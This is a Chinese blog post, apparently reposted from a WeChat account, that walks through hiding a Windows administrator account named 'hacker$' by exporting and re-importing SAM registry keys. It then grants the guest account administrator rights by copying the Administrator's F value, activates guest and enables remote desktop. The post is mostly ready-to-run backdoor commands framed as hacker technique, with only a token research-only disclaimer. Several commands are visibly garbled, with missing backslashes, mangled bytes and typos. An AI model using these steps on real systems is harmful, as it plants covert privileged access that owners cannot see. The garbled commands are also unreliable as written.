前言1:我那个脚本可以用,如果出现问题,关掉窗口再执行一遍。
前言2:据一位没有性生活的男粉丝提示,用户在加了administrators组后,把用户的F值改为超管的F值是没有意义。仔细一看,的确是,果然不能无脑抄陈年网文。
1.添加隐藏用户
用户在加了administrators组后,把用户的F值改为超管的F值是没有意义net user hacker$ donotusetohack /add#添加帐号hacker$net localgroup administrators hacker$ /add#把帐号添加到管理组reg export hklmSAMSAMDomainsAccountUsersNameshacker$ hacker_name.reg#导出hacker$的用户名信息reg export hklmSAMSAMDomainsAccountUsers�00003EE{hacker_type} hacker_account.reg#导出hacker$的帐号信息net user hacker$ /delregedit /s hacker_name.regregedit /s hacker_account.regnet user hacker$ /active:yes
按照上面的操作进行添加是可以做到:
命令行隐藏和控制面板隐藏,但是在windows企业版的控制面板下是可以看到创建的用户的。
2.guest用户赋权
既然可以看到用户就增加了暴露的风险,作为一名优质的黑客,当然得有精益求精的精神。既然会被看到我们可以尝试利用同样的姿势更改guest用户的F值,给guest赋权。
2.1操作如下
net user guest happyhack#增加guest帐号密码reg export hklmSAMSAMDomainsAccountUsers�00001F5 guest.reg#导出guest帐号信息(需要system权限)reg export hklmSAMSAMDomainsAccountUsers�00001F4 admin.reg#导出administrator帐号信息(需要system权限)powershell "$a=(Get-Content -Path .1.reg -TotalCount 100)[3..6];$b=(Get-Content -Path .admin.reg -TotalCount 100)[0..2];$c=(Get-Content -Path .guest.reg -TotalCount 100)[7..99];$b+$a+$c>>1.reg"#替换guestF值并输出到1.regregedist /s 1.reg#注册更改号的reg文件net user guest /active:yes#激活guest帐号reg add "HKLMSOFTWAREPoliciesMicrosoftWindows NTTerminal Services" /v fDenyTSConnections /t REG_DWORD /d 0#开启远程卓弥岸#编辑组策略允许guest本地和网络登录(图形化操作,命令一定有,自己去查)
可以达到效果:
1.在超级管理员组看不到用户
2.guest拥有管理员权限
写在最后:感谢那个没有性生活的男粉丝,顺带帮他找女朋友。
。:.゚ヽ(。◕‿◕。)ノ゚.:。+゚防盗专用。:.゚ヽ(。◕‿◕。)ノ゚.:。+゚
^_^文章来源:微信公众号(边界骇客) ^_^
本文始发于微信公众号(边界骇客):WINDOWS帐号隐藏-续(guest设置为超管)
免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论